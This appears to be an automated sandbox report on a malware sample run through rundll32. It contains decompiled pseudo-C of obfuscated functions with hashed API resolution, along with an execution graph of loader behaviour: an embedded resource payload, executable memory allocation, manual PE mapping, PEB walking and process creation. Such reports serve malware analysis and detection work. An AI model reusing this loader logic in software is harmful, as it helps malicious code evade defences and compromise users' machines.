                                                                                                                                    			E00218F9E(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12) {
				unsigned int _v8;
				unsigned int _v12;
				void* _t19;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E002120B9(_t19);
				_v12 = 0xd87912;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0006adfb;
				_v8 = 0xf5ad8e;
				_v8 = _v8 + 0xc481;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x00032ff7;
				E0021AA30(0x26e, 0x20a9b263, __ecx, 0x37d4b579);
				_t24 = CloseServiceHandle(_a12); // executed
				return _t24;
			}







                                                                                                                                    0x00218fa1
                                                                                                                                    0x00218fa2
                                                                                                                                    0x00218fa3
                                                                                                                                    0x00218fa6
                                                                                                                                    0x00218fa9
                                                                                                                                    0x00218fad
                                                                                                                                    0x00218fae
                                                                                                                                    0x00218fb3
                                                                                                                                    0x00218fbd
                                                                                                                                    0x00218fc6
                                                                                                                                    0x00218fcd
                                                                                                                                    0x00218fd4
                                                                                                                                    0x00218fdb
                                                                                                                                    0x00218fdf
                                                                                                                                    0x00218ff7
                                                                                                                                    0x00219002
                                                                                                                                    0x00219007

                                                                                                                                    APIs
                                                                                                                                    • CloseServiceHandle.ADVAPI32(33E0711C), ref: 00219002
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000A.00000002.523188854.0000000000201000.00000020.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                    • Associated: 0000000A.00000002.523168890.0000000000200000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 0000000A.00000002.523256219.0000000000223000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_10_2_200000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseHandleService
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1725840886-0
                                                                                                                                    • Opcode ID: 7721f494cb045c1adf2975ecc10c8ea825fd6ee4babf1da4d00f55aede024231
                                                                                                                                    • Instruction ID: af687aad1a30d7990b1e1d97221e2c897e99e48a1841b1e794f1fd39948d7217
                                                                                                                                    • Opcode Fuzzy Hash: 7721f494cb045c1adf2975ecc10c8ea825fd6ee4babf1da4d00f55aede024231
                                                                                                                                    • Instruction Fuzzy Hash: C9F0F9B591120CFFDF05AFD4C94A89EBBB4EB24308F208198F80562611E6769B68EF51
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00215BFD Relevance: 1.5, APIs: 1, Instructions: 31libraryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 76%
                                                                                                                                    			E00215BFD(intOrPtr __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t20;
				struct HINSTANCE__* _t25;

				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E002120B9(_t20);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x5faaf9;
				_v20 = 0xab22cd;
				_v12 = 0x8e3542;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x00089943;
				_v8 = 0x9b967a;
				_v8 = _v8 ^ 0x4689732a;
				_v8 = _v8 ^ 0x4619bdd7;
				E0021AA30(0x12d, 0x9df7cc0d, __ecx, 0xf5e9dd1e);
				_t25 = LoadLibraryW(_a8); // executed
				return _t25;
			}










                                                                                                                                    0x00215c03
                                                                                                                                    0x00215c06
                                                                                                                                    0x00215c0a
                                                                                                                                    0x00215c0b
                                                                                                                                    0x00215c10
                                                                                                                                    0x00215c17
                                                                                                                                    0x00215c23
                                                                                                                                    0x00215c2a
                                                                                                                                    0x00215c31
                                                                                                                                    0x00215c35
                                                                                                                                    0x00215c3c
                                                                                                                                    0x00215c43
                                                                                                                                    0x00215c4a
                                                                                                                                    0x00215c62
                                                                                                                                    0x00215c6d
                                                                                                                                    0x00215c72

                                                                                                                                    APIs
                                                                                                                                    • LoadLibraryW.KERNEL32(00000000), ref: 00215C6D
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000A.00000002.523188854.0000000000201000.00000020.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                    • Associated: 0000000A.00000002.523168890.0000000000200000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 0000000A.00000002.523256219.0000000000223000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_10_2_200000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1029625771-0
                                                                                                                                    • Opcode ID: e382c7baeaf3a69a46a4a7878245b3f76dac83df27b8d9f7b041c7ed08bbac4f
                                                                                                                                    • Instruction ID: 7786319d1debb7de0d4090947a8028698b444e82a9aba98e48f2b68e40cf5c22
                                                                                                                                    • Opcode Fuzzy Hash: e382c7baeaf3a69a46a4a7878245b3f76dac83df27b8d9f7b041c7ed08bbac4f
                                                                                                                                    • Instruction Fuzzy Hash: F6F0ECB5C1020CFBCB04AFE4DA06AEEBBB4EB50318F108188E91566212D3B54B58DB91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0020B23C Relevance: 1.3, APIs: 1, Instructions: 36stringCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                    			E0020B23C(intOrPtr __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12, WCHAR* _a16) {
				signed int _v8;
				signed int _v12;
				void* _t27;
				int _t32;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E002120B9(_t27);
				_v12 = 0x6268;
				_v12 = _v12 ^ 0x57e834c3;
				_v12 = _v12 + 0xffff2919;
				_v12 = _v12 + 0xffff3e3d;
				_v12 = _v12 ^ 0x57e9dc2b;
				_v8 = 0xa46433;
				_v8 = _v8 + 0x98ba;
				_v8 = _v8 | 0xc390ebe9;
				_v8 = _v8 + 0xd5b0;
				_v8 = _v8 ^ 0xc3bab866;
				E0021AA30(0xb5, 0x9df7cc0d, __ecx, 0xaca78213);
				_t32 = lstrcmpiW(_a16, _a4); // executed
				return _t32;
			}







                                                                                                                                    0x0020b23f
                                                                                                                                    0x0020b240
                                                                                                                                    0x0020b241
                                                                                                                                    0x0020b244
                                                                                                                                    0x0020b247
                                                                                                                                    0x0020b24a
                                                                                                                                    0x0020b24e
                                                                                                                                    0x0020b24f
                                                                                                                                    0x0020b254
                                                                                                                                    0x0020b25e
                                                                                                                                    0x0020b26a
                                                                                                                                    0x0020b271
                                                                                                                                    0x0020b278
                                                                                                                                    0x0020b27f
                                                                                                                                    0x0020b286
                                                                                                                                    0x0020b28d
                                                                                                                                    0x0020b294
                                                                                                                                    0x0020b29b
                                                                                                                                    0x0020b2b3
                                                                                                                                    0x0020b2c1
                                                                                                                                    0x0020b2c6

                                                                                                                                    APIs
                                                                                                                                    • lstrcmpiW.KERNEL32(EE1E6DE5,57E9DC2B), ref: 0020B2C1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000A.00000002.523188854.0000000000201000.00000020.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                    • Associated: 0000000A.00000002.523168890.0000000000200000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 0000000A.00000002.523256219.0000000000223000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_10_2_200000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: lstrcmpi
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1586166983-0
                                                                                                                                    • Opcode ID: 26884a22f0da7bc497ec3f8ef604453e7fb46fa0b929fe200322ee9dcdc91410
                                                                                                                                    • Instruction ID: f2b115aa8bb0ed309f66a3b4352c237c03b6d04b8c2c76c1b1e295a57ff40ee7
                                                                                                                                    • Opcode Fuzzy Hash: 26884a22f0da7bc497ec3f8ef604453e7fb46fa0b929fe200322ee9dcdc91410
                                                                                                                                    • Instruction Fuzzy Hash: 980116B2C04608FFDF45DFD4DD468EEBBB5EB54314F208188B90566262E3728B64AB61
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00211E67 Relevance: 1.3, APIs: 1, Instructions: 34COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 72%
                                                                                                                                    			E00211E67(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t23;
				int _t29;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E002120B9(_t23);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x62b4e9;
				_v20 = 0xc383c4;
				_v12 = 0x238243;
				_v12 = _v12 * 0x67;
				_v12 = _v12 ^ 0x0e4d658b;
				_v8 = 0x6564d0;
				_v8 = _v8 ^ 0x2b193590;
				_v8 = _v8 << 0xd;
				_v8 = _v8 ^ 0x8a2acb03;
				E0021AA30(0x23f, 0x9df7cc0d, __ecx, 0x3185251c);
				_t29 = CloseHandle(_a12); // executed
				return _t29;
			}










                                                                                                                                    0x00211e6d
                                                                                                                                    0x00211e70
                                                                                                                                    0x00211e73
                                                                                                                                    0x00211e77
                                                                                                                                    0x00211e78
                                                                                                                                    0x00211e7d
                                                                                                                                    0x00211e84
                                                                                                                                    0x00211e90
                                                                                                                                    0x00211e97
                                                                                                                                    0x00211ead
                                                                                                                                    0x00211eb0
                                                                                                                                    0x00211eb7
                                                                                                                                    0x00211ebe
                                                                                                                                    0x00211ec5
                                                                                                                                    0x00211ec9
                                                                                                                                    0x00211ed6
                                                                                                                                    0x00211ee1
                                                                                                                                    0x00211ee6

                                                                                                                                    APIs
                                                                                                                                    • CloseHandle.KERNEL32(00C383C4), ref: 00211EE1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000A.00000002.523188854.0000000000201000.00000020.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                    • Associated: 0000000A.00000002.523168890.0000000000200000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 0000000A.00000002.523256219.0000000000223000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_10_2_200000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseHandle
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2962429428-0
                                                                                                                                    • Opcode ID: c4708a402737a47667ccad7e6bda5106f8ba5e7004358f80371dbad68f71623e
                                                                                                                                    • Instruction ID: 1c65cb39abdb77465f7e475fc4b5beed02b0baf7f119333a628f5320ee6cf46a
                                                                                                                                    • Opcode Fuzzy Hash: c4708a402737a47667ccad7e6bda5106f8ba5e7004358f80371dbad68f71623e
                                                                                                                                    • Instruction Fuzzy Hash: 4C0124B5C10208FBCF40EFA4E94A9AEBFB5EB14308F108498E81567212D7718B68DF91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Execution Graph

                                                                                                                                    Execution Coverage:16.1%
                                                                                                                                    Dynamic/Decrypted Code Coverage:16.2%
                                                                                                                                    Signature Coverage:0%
                                                                                                                                    Total number of Nodes:297
                                                                                                                                    Total number of Limit Nodes:23
                                                                                                                                    execution_graph 31846 10035042 TlsGetValue 31847 10035076 GetModuleHandleA 31846->31847 31848 10035055 31846->31848 31850 10035085 GetProcAddress 31847->31850 31851 1003509f 31847->31851 31848->31847 31849 1003505f TlsGetValue 31848->31849 31854 1003506a 31849->31854 31852 1003506e 31850->31852 31852->31851 31853 10035095 RtlEncodePointer 31852->31853 31853->31851 31854->31847 31854->31852 31855 10020c26 31858 10020c32 __EH_prolog3 31855->31858 31857 10020c80 31882 100206c8 EnterCriticalSection TlsGetValue LeaveCriticalSection LeaveCriticalSection 31857->31882 31858->31857 31866 1002083b EnterCriticalSection 31858->31866 31880 100201f1 RaiseException __CxxThrowException@8 31858->31880 31881 1002094b TlsAlloc InitializeCriticalSection 31858->31881 31862 10020c8d 31863 10020c93 31862->31863 31864 10020ca6 ~_Task_impl 31862->31864 31883 100209ed 88 API calls 4 library calls 31863->31883 31871 1002085a 31866->31871 31867 10020916 _memset 31868 1002092a LeaveCriticalSection 31867->31868 31868->31858 31869 10020893 31884 10014460 31869->31884 31870 100208a8 GlobalHandle GlobalUnlock 31873 10014460 ctype 80 API calls 31870->31873 31871->31867 31871->31869 31871->31870 31875 100208c5 GlobalReAlloc 31873->31875 31876 100208cf 31875->31876 31877 100208f7 GlobalLock 31876->31877 31878 100208da GlobalHandle GlobalLock 31876->31878 31879 100208e8 LeaveCriticalSection 31876->31879 31877->31867 31878->31879 31879->31877 31881->31858 31882->31862 31883->31864 31885 10014477 ctype 31884->31885 31886 1001448c GlobalAlloc 31885->31886 31888 10013ba0 80 API calls ctype 31885->31888 31886->31876 31888->31886 31889 10030d06 31890 10030d12 31889->31890 31891 10030d0d 31889->31891 31895 10030c10 31890->31895 31907 1003906d GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 31891->31907 31894 10030d23 31897 10030c1c _printf 31895->31897 31896 10030c69 31905 10030cb9 _printf 31896->31905 31962 100125c0 31896->31962 31897->31896 31897->31905 31908 10030a37 31897->31908 31901 10030c99 31902 10030a37 __CRT_INIT@12 165 API calls 31901->31902 31901->31905 31902->31905 31903 100125c0 ___DllMainCRTStartup 146 API calls 31904 10030c90 31903->31904 31906 10030a37 __CRT_INIT@12 165 API calls 31904->31906 31905->31894 31906->31901 31907->31890 31909 10030b61 31908->31909 31910 10030a4a GetProcessHeap HeapAlloc 31908->31910 31912 10030b67 31909->31912 31913 10030b9c 31909->31913 31911 10030a6e GetVersionExA 31910->31911 31926 10030a67 31910->31926 31914 10030a89 GetProcessHeap HeapFree 31911->31914 31915 10030a7e GetProcessHeap HeapFree 31911->31915 31920 10030b86 31912->31920 31912->31926 32010 100310be 67 API calls _doexit 31912->32010 31916 10030ba1 31913->31916 31917 10030bfa 31913->31917 31918 10030ab5 31914->31918 31915->31926 31994 10035135 6 API calls __decode_pointer 31916->31994 31917->31926 32029 10035425 79 API calls 2 library calls 31917->32029 31984 10036624 HeapCreate 31918->31984 31920->31926 32011 100389ee 68 API calls ___free_lc_time 31920->32011 31921 10030ba6 31995 10035840 31921->31995 31926->31896 31927 10030aeb 31927->31926 31930 10030af4 31927->31930 32001 1003548e 78 API calls 7 library calls 31930->32001 31931 10030b90 32012 10035178 70 API calls 2 library calls 31931->32012 31932 10030bbe 32014 100350ae TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress 31932->32014 31936 10030af9 __RTC_Initialize 31940 10030b0c GetCommandLineA 31936->31940 31954 10030afd 31936->31954 31937 10030b95 32013 1003667e VirtualFree HeapFree HeapFree HeapDestroy 31937->32013 32003 10038d66 77 API calls 3 library calls 31940->32003 31941 10030bd0 31943 10030bd7 31941->31943 31944 10030bee 31941->31944 32015 100351b5 67 API calls 4 library calls 31943->32015 32016 1002fa69 31944->32016 31946 10030b1c 32004 100387ae 72 API calls 3 library calls 31946->32004 31949 10030bde GetCurrentThreadId 31949->31926 31950 10030b26 31951 10030b2a 31950->31951 32006 10038cad 111 API calls 3 library calls 31950->32006 32005 10035178 70 API calls 2 library calls 31951->32005 32002 1003667e VirtualFree HeapFree HeapFree HeapDestroy 31954->32002 31955 10030b36 31956 10030b4a 31955->31956 32007 10038a3a 110 API calls 6 library calls 31955->32007 31961 10030b02 31956->31961 32009 100389ee 68 API calls ___free_lc_time 31956->32009 31959 10030b3f 31959->31956 32008 10030f4d 75 API calls 3 library calls 31959->32008 31961->31926 32055 10006a90 31962->32055 31965 1001265a 32089 1002fe65 105 API calls 4 library calls 31965->32089 31966 1001261c FindResourceW LoadResource SizeofResource 31969 10006a90 ___DllMainCRTStartup 67 API calls 31966->31969 31972 10012744 ___DllMainCRTStartup 31969->31972 31971 1001284d 31971->31901 31971->31903 31973 100127b7 VirtualAlloc 31972->31973 31974 1001279b VirtualAllocExNuma 31972->31974 31975 100127da 31973->31975 31974->31975 32060 1002fb00 31975->32060 31979 100127fa 32083 10002970 31979->32083 31981 10012810 ___DllMainCRTStartup 32086 100026a0 31981->32086 31983 10012664 32090 1002f81e 5 API calls __invoke_watson 31983->32090 31985 10036647 31984->31985 31986 10036644 31984->31986 32030 100365c9 67 API calls 3 library calls 31985->32030 31986->31927 31988 1003664c 31989 10036656 31988->31989 31990 1003667a 31988->31990 32031 10035aca HeapAlloc 31989->32031 31990->31927 31992 10036660 31992->31990 31993 10036665 HeapDestroy 31992->31993 31993->31986 31994->31921 31996 10035844 31995->31996 31998 10030bb2 31996->31998 31999 10035864 Sleep 31996->31999 32032 10030678 31996->32032 31998->31926 31998->31932 32000 10035879 31999->32000 32000->31996 32000->31998 32001->31936 32002->31961 32003->31946 32004->31950 32005->31954 32006->31955 32007->31959 32008->31956 32009->31951 32010->31920 32011->31931 32012->31937 32013->31926 32014->31941 32015->31949 32017 1002fa75 _printf 32016->32017 32018 1002fab4 32017->32018 32021 1002faee __expand _printf 32017->32021 32051 10035a99 67 API calls 2 library calls 32017->32051 32019 1002fac9 HeapFree 32018->32019 32018->32021 32019->32021 32022 1002fadb 32019->32022 32021->31961 32054 100311f4 67 API calls __getptd_noexit 32022->32054 32023 1002fa8c ___sbh_find_block 32026 1002faa6 32023->32026 32052 10035b3d VirtualFree VirtualFree HeapFree ___BuildCatchObjectHelper 32023->32052 32025 1002fae0 GetLastError 32025->32021 32053 1002fabf LeaveCriticalSection _doexit 32026->32053 32029->31926 32030->31988 32031->31992 32033 10030684 _printf 32032->32033 32034 1003069c 32033->32034 32044 100306bb _memset 32033->32044 32045 100311f4 67 API calls __getptd_noexit 32034->32045 32036 100306a1 32046 10037753 4 API calls 2 library calls 32036->32046 32038 1003072d RtlAllocateHeap 32038->32044 32041 100306b1 _printf 32041->31996 32044->32038 32044->32041 32047 10035a99 67 API calls 2 library calls 32044->32047 32048 100362e6 5 API calls 2 library calls 32044->32048 32049 10030774 LeaveCriticalSection _doexit 32044->32049 32050 100368d5 TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress __decode_pointer 32044->32050 32045->32036 32047->32044 32048->32044 32049->32044 32050->32044 32051->32023 32052->32026 32053->32018 32054->32025 32056 1002f9a6 _malloc 67 API calls 32055->32056 32058 10006aa1 32056->32058 32057 10006aad 32057->31965 32057->31966 32058->32057 32059 1002fa69 ___free_lc_time 67 API calls 32058->32059 32059->32057 32061 1002fb18 32060->32061 32062 1002fb3f __VEC_memcpy 32061->32062 32063 100127eb 32061->32063 32062->32063 32064 1002f9a6 32063->32064 32065 1002fa53 32064->32065 32076 1002f9b4 32064->32076 32098 100368d5 TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress __decode_pointer 32065->32098 32067 1002fa59 32099 100311f4 67 API calls __getptd_noexit 32067->32099 32070 1002fa5f 32070->31979 32073 1002fa17 RtlAllocateHeap 32073->32076 32074 1002f9c9 32074->32076 32091 10036892 67 API calls 2 library calls 32074->32091 32092 100366f2 67 API calls 7 library calls 32074->32092 32093 10030e7b GetModuleHandleA GetProcAddress ExitProcess ___crtCorExitProcess 32074->32093 32076->32073 32076->32074 32077 1002fa4a 32076->32077 32078 1002fa3e 32076->32078 32081 1002fa3c 32076->32081 32094 1002f957 67 API calls 4 library calls 32076->32094 32095 100368d5 TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress __decode_pointer 32076->32095 32077->31979 32096 100311f4 67 API calls __getptd_noexit 32078->32096 32097 100311f4 67 API calls __getptd_noexit 32081->32097 32084 1002f9a6 _malloc 67 API calls 32083->32084 32085 10002990 32084->32085 32085->31981 32100 10002280 32086->32100 32089->31983 32090->31971 32091->32074 32092->32074 32094->32076 32095->32076 32096->32081 32097->32077 32098->32067 32099->32070 32137 10001990 32100->32137 32103 100022c3 SetLastError 32134 100022a9 32103->32134 32104 100022d5 32105 10001990 ___DllMainCRTStartup SetLastError 32104->32105 32106 100022ee 32105->32106 32107 10002310 SetLastError 32106->32107 32108 10002322 32106->32108 32106->32134 32107->32134 32109 10002331 SetLastError 32108->32109 32110 10002343 32108->32110 32109->32134 32111 1000234e SetLastError 32110->32111 32113 10002360 GetNativeSystemInfo 32110->32113 32111->32134 32114 10002414 SetLastError 32113->32114 32115 10002426 VirtualAlloc 32113->32115 32114->32134 32116 10002472 GetProcessHeap HeapAlloc 32115->32116 32117 10002447 VirtualAlloc 32115->32117 32119 100024ac 32116->32119 32120 1000248c VirtualFree SetLastError 32116->32120 32117->32116 32118 10002463 SetLastError 32117->32118 32118->32134 32121 10001990 ___DllMainCRTStartup SetLastError 32119->32121 32120->32134 32122 1000250e 32121->32122 32123 10002512 32122->32123 32124 1000251c VirtualAlloc 32122->32124 32175 10002840 VirtualFree VirtualFree GetProcessHeap HeapFree ___DllMainCRTStartup 32123->32175 32125 1000254b ___DllMainCRTStartup 32124->32125 32140 100019c0 32125->32140 32128 1000257f ___DllMainCRTStartup 32128->32123 32150 10001ff0 32128->32150 32132 100025e8 ___DllMainCRTStartup 32132->32123 32132->32134 32169 26e991 32132->32169 32134->31983 32135 1000264f SetLastError 32135->32123 32138 100019ab 32137->32138 32139 1000199f SetLastError 32137->32139 32138->32103 32138->32104 32138->32134 32139->32138 32141 100019f0 32140->32141 32142 10001a83 32141->32142 32144 10001a2c VirtualAlloc 32141->32144 32149 10001aa0 ___DllMainCRTStartup 32141->32149 32143 10001990 ___DllMainCRTStartup SetLastError 32142->32143 32145 10001a9c 32143->32145 32146 10001a50 32144->32146 32147 10001a57 ___DllMainCRTStartup 32144->32147 32148 10001aa4 VirtualAlloc 32145->32148 32145->32149 32146->32149 32147->32141 32148->32149 32149->32128 32151 10002029 IsBadReadPtr 32150->32151 32160 1000201f 32150->32160 32153 10002053 32151->32153 32151->32160 32154 10002085 SetLastError 32153->32154 32155 10002099 32153->32155 32153->32160 32154->32160 32176 100018b0 VirtualQuery VirtualFree VirtualAlloc ___DllMainCRTStartup 32155->32176 32157 100020b3 32158 100020bf SetLastError 32157->32158 32162 100020e9 32157->32162 32158->32160 32160->32123 32163 10001cb0 32160->32163 32161 100021f9 SetLastError 32161->32160 32162->32160 32162->32161 32164 10001cf8 ___DllMainCRTStartup 32163->32164 32165 10001e01 32164->32165 32167 10001ddd 32164->32167 32177 10001b80 32164->32177 32166 10001b80 ___DllMainCRTStartup 2 API calls 32165->32166 32166->32167 32167->32132 32170 26ea62 32169->32170 32174 26ea8d 32169->32174 32184 26f8fd 32170->32184 32174->32134 32174->32135 32175->32134 32176->32157 32178 10001b9c 32177->32178 32179 10001b92 32177->32179 32181 10001c04 VirtualProtect 32178->32181 32182 10001baa 32178->32182 32179->32164 32181->32179 32182->32179 32183 10001be2 VirtualFree 32182->32183 32183->32179 32186 26fde0 32184->32186 32185 26ffd1 32208 26ab87 32185->32208 32186->32185 32189 26ea75 32186->32189 32192 27dcf7 GetPEB 32186->32192 32196 26a8b0 GetPEB 32186->32196 32200 26b23c 32186->32200 32204 2746bb 32186->32204 32218 27da22 GetPEB 32186->32218 32219 2647ce GetPEB 32186->32219 32220 26f899 GetPEB 32186->32220 32221 264b61 32186->32221 32189->32174 32197 2693ed 32189->32197 32192->32186 32196->32186 32198 27aa30 GetPEB 32197->32198 32199 269456 ExitProcess 32198->32199 32199->32174 32201 26b254 32200->32201 32225 27aa30 32201->32225 32205 2746da 32204->32205 32206 27aa30 GetPEB 32205->32206 32207 274729 SHGetFolderPathW 32206->32207 32207->32186 32209 26abb0 32208->32209 32210 264b61 GetPEB 32209->32210 32211 26ad67 32210->32211 32233 267f5d 32211->32233 32213 26ad99 32214 26ada4 32213->32214 32237 271e67 GetPEB 32213->32237 32214->32189 32216 26adc4 32238 271e67 GetPEB 32216->32238 32218->32186 32219->32186 32220->32186 32222 264b74 32221->32222 32239 261ea7 32222->32239 32226 27ab1d 32225->32226 32230 26b2b8 lstrcmpiW 32225->32230 32231 270a0e GetPEB 32226->32231 32228 27ab33 32232 26cdcd GetPEB 32228->32232 32230->32186 32231->32228 32232->32230 32234 267f8e 32233->32234 32235 27aa30 GetPEB 32234->32235 32236 267fd4 CreateProcessW 32235->32236 32236->32213 32237->32216 32238->32214 32240 261ebc 32239->32240 32243 26702c 32240->32243 32244 267049 32243->32244 32245 27aa30 GetPEB 32244->32245 32246 261f4c 32245->32246 32246->32186

                                                                                                                                    Executed Functions

                                                                                                                                    Function 100125C0 Relevance: 45.7, APIs: 7, Strings: 19, Instructions: 165memoryCOMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 10006A90: _malloc.LIBCMT ref: 10006A9C
                                                                                                                                    • _printf.LIBCMT ref: 1001265F
                                                                                                                                    • FindResourceW.KERNEL32(00000000,00001705,DASHBOARD), ref: 1001268A
                                                                                                                                    • LoadResource.KERNEL32(00000000,00000000), ref: 1001269B
                                                                                                                                    • SizeofResource.KERNEL32(00000000,00000000), ref: 100126AC
                                                                                                                                    • VirtualAllocExNuma.KERNELBASE(000000FF,00000000,00000000,00003000,00000040,00000000), ref: 100127AC
                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00000000,-100510CC,00000040), ref: 100127D1
                                                                                                                                    • _malloc.LIBCMT ref: 100127F5
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.527063809.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 0000000B.00000002.527057151.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                    • Associated: 0000000B.00000002.527138701.0000000010046000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                    • Associated: 0000000B.00000002.527165862.0000000010053000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                    • Associated: 0000000B.00000002.527177916.0000000010057000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                    • Associated: 0000000B.00000002.527189497.000000001005A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Resource$AllocVirtual_malloc$FindLoadNumaSizeof_printf
                                                                                                                                    • String ID: .$.$2$3$6p2Z6a6CZ&M>ZR$a@Y$xnQ?<XBeh<22mz&0$DASHBOARD$d$d$e$kre3.l$l$l$l$l$l$l$l$n$ndldl
                                                                                                                                    • API String ID: 572389289-2839844625
                                                                                                                                    • Opcode ID: adac8d752e0c47dc141f46a7132d7a35c557a18b7d00a43f57a8df52d4076e8d
                                                                                                                                    • Instruction ID: 8f66a7c676ce8d0fa2ca8bd8519024a549b55f77dd79b918ae70bd0eec3b217e
                                                                                                                                    • Opcode Fuzzy Hash: adac8d752e0c47dc141f46a7132d7a35c557a18b7d00a43f57a8df52d4076e8d
                                                                                                                                    • Instruction Fuzzy Hash: FB613EB5D10218EBEB00DFA0DC95B9EBBB5FF08344F10911CE504AB390E7B66548CB6A
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 10002280 Relevance: 22.8, APIs: 15, Instructions: 331COMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
